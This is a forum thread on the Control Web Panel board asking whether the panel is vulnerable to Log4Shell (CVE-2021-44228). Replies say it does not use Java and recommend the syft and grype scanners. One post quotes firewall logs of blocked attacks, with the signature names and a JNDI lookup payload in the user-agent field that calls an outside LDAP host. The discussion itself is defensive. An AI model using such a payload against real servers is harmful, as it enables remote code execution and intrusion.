Control Web Panel
WebPanel => CentOS 7 Problems => Topic started by: Painkiller88 on December 13, 2021, 09:58:54 AM
-
Hi,
Are we affected by log4j volunerability and if yes, when does it get patched?
thanks
-
I attach to the question. I also do not know if cwp is susceptible. Attempts to exploit this vulnerability are already appearing on the firewall.
2021-12-12T00:57:22 suricata[78162] [Drop] [1:10006897:2] ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034649:1] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034647:1] ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":10006897,"rev":2,"signature":"ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"created_at":["2021_12_10"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034649,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034647,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
-
what log file has you checked for this?
Wanna check on mine also
thanks
-
External firewall
-
cwp is not using ldap or log4j or java.
-
The best article I could find about it was this:
https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html (https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html)
You can check your server with 'syft':
https://github.com/anchore/syft (https://github.com/anchore/syft)
If there is any java jar class on your server, it should be checked with 'grype':
https://github.com/anchore/grype
Regards,
Netino